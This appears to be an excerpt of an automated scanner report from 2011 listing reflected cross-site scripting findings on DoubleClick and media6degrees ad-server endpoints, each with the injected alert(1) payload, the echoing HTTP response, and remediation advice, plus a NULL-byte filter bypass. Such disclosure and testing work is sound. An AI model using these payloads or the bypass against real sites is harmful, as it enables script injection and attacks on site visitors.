Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5976
Date: Tue, 28 Jun 2011 03:32:03 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 31 08:48:20 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ick%3Bh%3Dv8/3b34/f/a7/%2a/u%3B242057942%3B0-0%3B0%3B64814706%3B4307-300/250%3B42417319/42435106/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=465483413437812717&mt_id=118747&mt_adid=5354176"-alert(1)-"35e05f8a498&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.waterdeliveryoffers.com/gateway.cfm%3Facode%3DBAAAAA0N000"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "o ...[SNIP]...
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3cda"-alert(1)-"eecdafd0da1 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5976
Date: Tue, 28 Jun 2011 03:31:43 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 31 08:48:20 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... lick.net/click%3Bh%3Dv8/3b34/f/a7/%2a/u%3B242057942%3B0-0%3B0%3B64814706%3B4307-300/250%3B42417319/42435106/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=465483413437812717&mt_id=118747c3cda"-alert(1)-"eecdafd0da1&mt_adid=53&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.waterdeliveryoffers.com/gateway.cfm%3Facode%3DBAAAAA0N000"); var fscUrl = url; var fscUrlClickTagFound = false; var ...[SNIP]...
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c79bd"-alert(1)-"583b910f332 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5976
Date: Tue, 28 Jun 2011 03:32:24 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 31 08:48:20 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 0%3B0%3B64814706%3B4307-300/250%3B42417319/42435106/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=465483413437812717&mt_id=118747&mt_adid=53&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530c79bd"-alert(1)-"583b910f332&redirect=http%3a%2f%2fwww.waterdeliveryoffers.com/gateway.cfm%3Facode%3DBAAAAA0N000"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptacces ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70284"-alert(1)-"c4ab2baee7c was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5976
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 03:32:41 GMT
Expires: Tue, 28 Jun 2011 03:32:41 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 31 08:48:20 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 814706%3B4307-300/250%3B42417319/42435106/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=465483413437812717&mt_id=118747&mt_adid=53&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=70284"-alert(1)-"c4ab2baee7chttp%3a%2f%2fwww.waterdeliveryoffers.com/gateway.cfm%3Facode%3DBAAAAA0N000"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afcf2"-alert(1)-"63efab65b02 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5976
Date: Tue, 28 Jun 2011 03:31:26 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 31 08:48:20 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/a7/%2a/u%3B242057942%3B0-0%3B0%3B64814706%3B4307-300/250%3B42417319/42435106/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=465483413437812717afcf2"-alert(1)-"63efab65b02&mt_id=118747&mt_adid=53&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.waterdeliveryoffers.com/gateway.cfm%3Facode%3DBAAAAA0N000"); var fscUrl = url; var fscUrlClickTagFound ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a3ba'-alert(1)-'01b7f7cedad was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6016
Date: Tue, 28 Jun 2011 02:54:41 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Wed Apr 13 09:46:26 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... %3Bh%3Dv8/3b34/f/aa/%2a/g%3B240570459%3B0-0%3B0%3B61251276%3B4307-300/250%3B41111994/41129781/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750&mt_adid=1004485a3ba'-alert(1)-'01b7f7cedad&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.nylaarp.com/694\"> ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0036e76"-alert(1)-"c692859c262 was submitted in the mt_adid parameter. This input was echoed as 36e76"-alert(1)-"c692859c262 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6028
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 02:54:37 GMT
Expires: Tue, 28 Jun 2011 02:54:37 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Wed Apr 13 09:46:26 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... h%3Dv8/3b34/f/ad/%2a/g%3B240570459%3B0-0%3B0%3B61251276%3B4307-300/250%3B41111994/41129781/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750&mt_adid=100448%0036e76"-alert(1)-"c692859c262&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.nylaarp.com/694"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscr ...[SNIP]...
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c83d2'-alert(1)-'90040ac53db was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d2cd'-alert(1)-'e6902756722 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6016
Date: Tue, 28 Jun 2011 02:55:12 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Wed Apr 13 09:46:26 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... B0%3B61251276%3B4307-300/250%3B41111994/41129781/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750&mt_adid=100448&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c3065308d2cd'-alert(1)-'e6902756722&redirect=http%3a%2f%2fwww.nylaarp.com/694\"> ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7251'-alert(1)-'2917f9be78f was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6016
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 02:55:32 GMT
Expires: Tue, 28 Jun 2011 02:55:32 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Wed Apr 13 09:46:26 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... 276%3B4307-300/250%3B41111994/41129781/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750&mt_adid=100448&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=a7251'-alert(1)-'2917f9be78fhttp%3a%2f%2fwww.nylaarp.com/694\"> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dca11'-alert(1)-'054d5ab12e9 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6016
Date: Tue, 28 Jun 2011 02:54:01 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Wed Apr 13 09:46:26 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... p://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/aa/%2a/g%3B240570459%3B0-0%3B0%3B61251276%3B4307-300/250%3B41111994/41129781/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=29076741809768234dca11'-alert(1)-'054d5ab12e9&mt_id=112750&mt_adid=100448&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.nylaarp.com/694\"> ...[SNIP]...
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d32f1'-alert(1)-'db921ef1f73 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 3286
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 03:02:39 GMT
Expires: Tue, 28 Jun 2011 03:02:39 GMT
document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Wed Feb 03 10:54:52 EST 2010 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... ercard.com/credit-cards/cardbuilder/index.html?iq_id=o1112'; var alttext = ''; var dcgif = 'http://s0.2mdn.net/1796512/CB728x90.jpg'; var dccreativewidth = '728'; var dcwmode = 'opaque'; var imgurl = 'd32f1'-alert(1)-'db921ef1f73http://discovercard.com/credit-cards/cardbuilder/index.html?iq_id=o1112'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0.2mdn.net/1796512/CB728x90.swf'; var dcminversion = '9'; var d ...[SNIP]...
1.133. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.media6degrees.com
Path: /adserv/cs
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62ac5"-alert(1)-"553f8be859b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.